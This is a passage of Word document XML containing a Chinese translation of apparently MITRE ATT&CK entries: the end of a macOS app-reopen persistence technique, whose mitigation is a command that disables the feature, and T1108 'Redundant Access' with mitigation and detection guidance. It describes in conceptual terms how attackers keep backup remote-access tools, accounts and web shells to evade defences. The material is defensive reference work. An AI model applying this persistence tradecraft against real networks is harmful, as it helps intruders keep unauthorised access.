      <w:hyperlink r:id="rId68" w:tgtFrame="_blank" w:history="1"/>
    </w:p>
    <w:p w14:paraId="73E2AC63" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3393"/>
        <w:gridCol w:w="6343"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="4D106CB7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="59FC558A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="406A6779" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="0F36C566" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A278791" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004631C1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
                <w:color w:val="4F7CAC"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用或</w:t>
            </w:r>
            <w:r>
              <w:t>删除功能或程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29888C69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>此功能可以通过以下终端命令完全禁用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767F5D9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>defaults write -g ApplePersistence -bool no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="000F311F" w14:paraId="5464C0D9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433F959F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795BDE1C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录时按住</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> Shift </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>键可防止应用自动打开。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3847153B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A064E74" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E97E1C" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>与重新打开应用程序关联的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>特定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>该文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>指示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>应用程序何时注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以重新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>自身</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC7FB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>冗余访问</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="48EFD4EB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37BBBB69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> T1108</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38118CC7" w14:textId="0D3D240B" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14527BC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B63075D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611E499C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程使用网络，网络抓包，网络协议分析，文件监控，认证日志，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61FAC2CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵检测系统</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C105092" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33C81A28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="1EA041C2" w14:textId="71FC84D2" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以使用多个具有不同</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>协议的远程访问工具作为检测的对冲。如果检测到一种类型的工具作为响应，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进行拦截或删除，但组织没有完全了解攻击者的工具和访问权限，则攻击者将能够保留对网络的访问权限。尽管目标网络中部署的远程访问工具受到中断，攻击者还可能尝试访问</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7B04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>有效帐户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7B04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>外部远程服务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>如外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）作为维护访问的一种方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05075F0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7B04">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="005D7B04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令行管理程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是一种通过外部可访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>服务器，维护访问网络的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6830B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1869"/>
        <w:gridCol w:w="7867"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="140084B7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1869" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6E6DE023" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7867" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="083C7FD3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="59E5777E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F029C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防护</w:t>
            </w:r>
            <w:hyperlink r:id="rId69" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027EEA0C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>使用网络签名来标识特定攻击者恶意软件的流量的网络入侵检测和预防系统，可缓解网络级别的活动。签名通常用于协议中的唯一指标，并且在不同的恶意软件系列和版本中会有所不同。攻击者可能会随着时间的推移更改工具签名，或者以避免常见防御工具检测的方式构造协议。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53261243" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76977DFC" w14:textId="7A004FD9" w:rsidR="000F2665" w:rsidRPr="00DD0FD4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>现有的远程访问工具检测方法非常有用。备份远程访问工具或其他接入点在入侵期间可能没有建立</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通道，因此传输的数据量可能不如主通道高，除非访问丢失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC93119" w14:textId="320EC135" w:rsidR="000F2665" w:rsidRPr="00DD0FD4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>检测基于信标流量、</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>协议或对手基础结构的工具需要事先对攻击者可能使用的工具、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>地址和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或域进行威胁情报，同时能够检测网络边界上的使用情况。如果可以使用工具扫描这些指标，则事先了解折衷指标也有助于检测端点上的对手工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D4BFF" w14:textId="36EA0860" w:rsidR="000F2665" w:rsidRPr="00DD0FD4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>如果入侵正在进行，并且收集了足够的端点数据或解码的</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>流量，则防御者可能能够检测到攻击者执行操作时丢弃的其他工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25094D28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
